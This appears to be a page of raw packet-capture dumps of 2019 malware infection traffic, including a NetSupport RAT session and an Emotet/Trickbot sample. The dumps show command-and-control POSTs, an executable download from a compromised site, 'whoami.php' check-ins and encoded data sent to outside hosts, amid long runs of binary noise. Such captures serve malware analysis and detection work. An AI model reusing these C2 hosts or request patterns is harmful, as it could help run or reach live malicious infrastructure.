d8a60655f3cb4fc982227159c509085d2a6a784994c199aaa40699e38b4dcdc613735b0b5d7b5f2e6a784996cbdd98a60457b7ff4fcbc41376590229861d2e665e26e69c98e9d367399abf34cbc6136319091b5a1d3d2a784ddaa6bbeca40647b3d80dcbc3411a3e616d4a5d2c6a73510a89dd96806925ac8223aeb7661235606d315d2e6a680996c1cfd8b54655f78728adb211734b490a085d2b38112efeb7df98a4065ceb5707cbc3561e297d60485d6e79384996c1dd91be9a1ff3cd0eb9a372073c0919084e6e6a7a4b96c3dd98a2423487aa4fcbc613631909100a34492f162dffa2b39aa60455fad3d181c615302b6c783c382e6a385ad6c3de8e121615f3cf09aab272715909fd581d2e61391ae2a2afecef683196b34fcbc613631909100a34492f162dffa2b39aa60455f3cb4d5bd253734d064901335a0f0a2ff7a0b8ddc872278a63598bc6117359a50d085d20652c00f8b7b8eac06736968e23bfb46a6f590919485d2e6a784d96c3ddd8b54655f3cb4dcbc4103a104d1b485d3f2a785996c3dd9aa0500192a921aec413ef4949195c5d2e6a7a4edf8cbbfed56321f1cb3dda86136b5909194a5767070825d1a6a9ecc37457f3c94dcbc60f6619090d470d67040c2ce4a5bcfbc3523491a728ffd353735b091970486e6a7646c28ab3ecc3743392a8289fa7711f3ccd5c4c5d2e6a784996c1dd98a69a45b3cb4dcbc61371534c773c2f5729173cf8b7df98a60655f3cf4dcbc611741c676d3a344b197a4994c3dd98a68e40b3cb43cc925e162d61762c552e6a784996c3dd98a40655f3cb5c8bc6137359091b4c1e410e1d4b96c3ccd8a60255f3cb4fcf827207380b194a5d286a73510a89dd94806925ac8e3cbea77f1a2d7019485d3e2a784b8447c8d8a6021996ad39c9c601f74c49194d0f470d103d94c3df98ad1ec9b9cb43eda9632c10677c39284f06113defc3dd98b64655f1d9c9de861377156c7f3c5f2e78fc5cd6c3d8cacf613d87c94dc9c6186bc54319
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…477b411a270ee4a6bcecc374019baa23cbc6136319091b5ad93b2a784ddaa6bbeca4064777de0dcbc3411a3e616d4a5d2c6a73510a89dd8e806925ac8c3faea767162b5d71293361183d38e3a2b198a60645b3cb4fd9420633590d552d3b5a68785b12d69d98a3543c94a339c9c61173521185025d224c1739c98fb8ebd5523d92a54dcbc60333590b0bcc486e6a7c05f3a5a99aa614d1e68b4dce947a14317d1b485f2e6160d5dcc3cebec9760abfae3eb8927b1237466b0d2c5b0b144996c3cdd8a6044777de0dcbc25f163f7d1b484faa7f38499391b4ffce7257f3c94da3d15373590919485d2e6a784996c3dd14b94655f3cb4dcbae0433590919485d507238499ec3dd98a60655f303108bc6c32e190935281d2e4e18099687bdd8a64e35b3cb01ab86133339491920016e6afc15d6c365c4e60655f3e94d4dde53731d09edb7f1362a780b96372248be4655b1cbb9343f0b33594a19bca219733849d4c32967c01f15f3894d3f399c6a19095a48a9d1a961099680dd6c59fa4cb3cb0ecb32ec544349190b5dda952853d6c39e9852f929e98b4d88c6e78ce11359481e2e9e87ba8c83dddba6f2aaddd00dcb851387a67d02085d6d6a8cb627d89d98e406a10c20568bc65173adf63c541d2e2878bd69a8c1d8a645550734e4d786133059fde692416e6a3b49623cd085e60616f33fb28adb53731309ecb729332a780396352207bb4655b9cbba34140e33594319b0a203743849dcc32467f81815f3814d31399c6d19095348a6d1a266099689dd6459014ab3cb06cb3bec41464919025dd0952656d6c3909859f955f3cc1984a479163a7d3f48c5722a784fd5b1b8f9d26356f3cb4dcbc61b73580191571d2e6a784dc5a6b1fea40657f3ef4d039a53735d4f6b2d382d6a784996c3d598a70eddec8b4dcbc617203c657f4a5d2c6a51498e5f9798af423c80bb22b8a35c155a0919485d2e6278489e4bc2d8a60655f79828a7a011735b09274889722a7845dfadb4ecef682687aa23a8
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…a31073d1165948552e68784996c3dd98a6020696a72bc9c61373484919495d2623163ae2a2b3fbc30455f1cb62cb924e3359065a24384f040d39dfadaeecc7683696c84dcbc6137351091840d5312a784996c78efdca6057f3c94de2c60bef1309100b314f190b1defb3b89ba61246b3cb45cbc71bfb464919485d2a391d25f0c1dd9aa632553b900dcbcf501f387a6a063c430f7b492ed19d98ae0657f3cb4dcbc613735d5a7c243b2c6a38f18483dd99a60754f1cb4fcbff1393024919431e420b0b3ad8a2b0fdef7556f3cb5d8bc61b735b0919485d2e6a784dc5a6b1fea406574bd90dcbc713771768742d5f2e687862969f81d8a60d169faa3eb89672013c676d4b5d3a7938499ec3dc98a60655f3cb4dcf95761f3f0b194a5d076a6429d6c3d4dbca6726808223ada9107359185948552e6b784996c3dd98a6020696a72bc9c61173750901d4172e663127e5b7bcf6c563069ab128c8c68f63190911485c2e6a784996c3dd9cf5633995c94dc9c62f7351695948516704102ce4aaa9ebe0743a9ec84dcbd6537351091b485d2e6a784996c78efdca6057f3cb59d8861372590f580b314f190b4b96c1dda3a6f635b3cb4086a3671b366d582c395c0f0b3a95c3dd89e6065df3c94dcbc6137359091d1b38420c7a498427ccd8a60755f7852ca6a311735b092248294f2a7844dba6a9f0c9621497af3faeb56070590908085d266a7a4996c3dd98a60651a0ae21adc41371e11b59485c2e6e3628fba6df98a40613f3572c8bc6193e3c7d712739600b152c95c3658ae6065df3c84dcbc6137359091d1b38420c7a4996c3ccd8

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
a60755f48a29afb476002a0b1908e53c2a784b96c2dc9aa60455cecb55578c1361087c78243448031d2dd5afbcebd548349eae4ecb7e01335901194a5d2e6a784996c3d9cbc36a33f1cb0d73d45373580918495f2e687873962bbcd8a60a139aae21af8777172b6c6a3b5e2e6a690996cbdd9aae8e4ab3cb4dcbc24016356f1b484fca7b384997c3d9d6c76b30f1cb4fcbfc132f3b4919441b470f142dd7a7b9eac37526f0cb4dda86137b590b11c0426e6a78499290b8f4c00455f1735f8bc612735d477825382c6a7a49d0c309c5e60659b4ae3982a867162b6f782b382d6a7859d6c3d598a50eddec8b4dcbc617203c657f4a5d3c2a6b0996c2dd9bef4f11f1cb6dcbc613735b091a073f4468784b96fddd18f84655e28c28bf8f7d073c7b7f293e4b2f163de4bade982a1215f3c34dc9c6137359091948597d0f142f94c3cfd8b54655f2cb4e828f5771590b19795d36f632498784b8ecef682196b92baaa57627386b752d5e2e726d0996cbdd99a60655f3cb4dcbc24016356f1b485f2e59788dc883dd90f3683c87852ca6a31073e11b5948552e68784996c3dd98a6020696a72bc9c653cb4b4919495d2f6b7a4994c3e998be9a1ff3c218a5af67203a66692d5e2ed26a0996cbdd9aa60655f3cb4dcbc24016356f1b481d9678384997c3dc99a40657f3f84d039b53735f4c683d3c42197b4996d39d98ae0657fb43528bc613735d5a7c243b2c6a70c18983dd99a6051a91a14fcbc4135859d944085d252d1d3ddea2aef0e5693196c84d57d6537351091840d5312a784996c78efdca6057f3c94df8c63f131909111c327d1e0a20f8a4de981e1415f3c34dc9ce9b6c19091948597d0f142f94c39d20b44655f2cb4ccac413715952196c3d6e6a691af7a5b8dbc76a39b6b32eaeb6671a36671a48753d2a784196c0d510b94655f3cb4998a37f155b0911c0426e6a79499a86a5fbc37621bca927aea56771590919591d…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z.. 2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0 E..(..@....V ..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1×1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1×1.gif?ss&ss2img HTTP/1.1
Accept: /
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.…. 2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010 E….t@…#. ..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. .e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*. 2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.x@....M ..e.. ..7...$..@:..k..$b.S.c...$....lhZW_.. 2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28 E..8.y@...'i ..e.....…$. @.<4……#8o.$.1Y..D….W76 2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....: 2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254 E....|@....g ..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y* 2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.}@....H ..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z 2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337 E..m.~@..... ..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF.. 2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8..@….@ ..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o. 2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5. 2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7 2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$..@M.....K?...J...T.J.pU.].... 2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z. 2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M.. 2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8. @..... ..e.. ......$..@M.....K?.}..j...!.@.z.Du..9 2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.!@..... ..e.. ......$..@M.....K?.......B#...._MC}.h 2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.H@..... ..e.. ......$4O@M.....K?....P0.&..%.M..9*Y. 2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.I@..... ..e.. ......$..@M.....K?...,.OJ.......9uP4. 2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.J@..... ..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR. 2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.K@..... ..e.. ......$a.@M.....K?....J.G.... ..c...k 2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.L@..... ..e.. ......$;@@M.....K?..."h.A...1....&... 2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41 E..E.T@..... ..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_.. 2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.W@..... ..e.. ......$|.@M.....K?....F. .h."........ 2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296 E..D..@..... ..e.. ..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@…Y1
.e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T…..A.|…
.e.P…y.e….P…….HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename=”i5pv72yr.exe”
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@…vV
.eB. …….g…..P…”…GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E…..@…..
.e…….Pr..G..^.P…….POST /rtm/symbols/ HTTP/1.1
Referer: http://189.129.4.186/rtm/symbols/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.129.4.186
Content-Length: 518
Connection: Keep-Alive
Cache-Control: no-cache

6ll8i995327yEb1qC=SbbKQbNltyr7OEcfzxrUQ304Q2%2FW6l5R9lo%2B5pVxib%2FIt4w3Sjeay5KbFubuIws4O0t7iA%2FTTdyiyRHbY7ySX3cga1z4cQuduITiXM9R5e7rTet9Uod5fFGxgh4JKFGS5n1sQ2TqoRhHBRx7cyBqBFIuag5dqUNeimMgsfRfYiwz39hBgErZ2D0Phl7Y6pFo%2BgASm3UxQKPwVMO8ux4AN2qvVtS2pEQ1HZZcDFci1m1YUNPlvgGhz6Gdpiiz2nZ%2Fr4fpHEK8spNliNSciLGdp7XKmD3rkLzPW5Y2Gm6J0PHywumZH0hJryQUQdwGmeWY8LiNcnQW4bRzxcA%2FSgIA0B8peygnfyCIwigVnD%2FwUBRRFjTCh5crDpm86cA9sZx1tnMgWbVF3cyJLDXvAkyYI%2B9IReYi9WIMTYjpUuPBxEm5zYaLYolpypw07kquVeRU5xXpSD3wp4D7w%2BmBFphGa1%2FKfn4%3D
2019-09-18 13:33:30.713609 IP 10.9.18.101.49166 > 104.236.185.25.8080: Flags [P.], seq 1031397366:1031397638, ack 3231780717, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….K
.eh…….=y…..mP…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:30.722484 IP 10.9.18.101.49167 > 104.236.185.25.8080: Flags [P.], seq 2799073531:2799073803, ack 2887398240, win 64240, length 272: HTTP: GET /whoami.php HTTP/1.1
E..8..@….I
.eh………x…3`P…….GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.236.185.25:8080
Cache-Control: no-cache

2019-09-18 13:33:31.019952 IP 66.228.32.31.443 > 10.9.18.101.49165: Flags [P.], seq 1:211, ack 269, win 64240, length 210
E…]…..].B. .
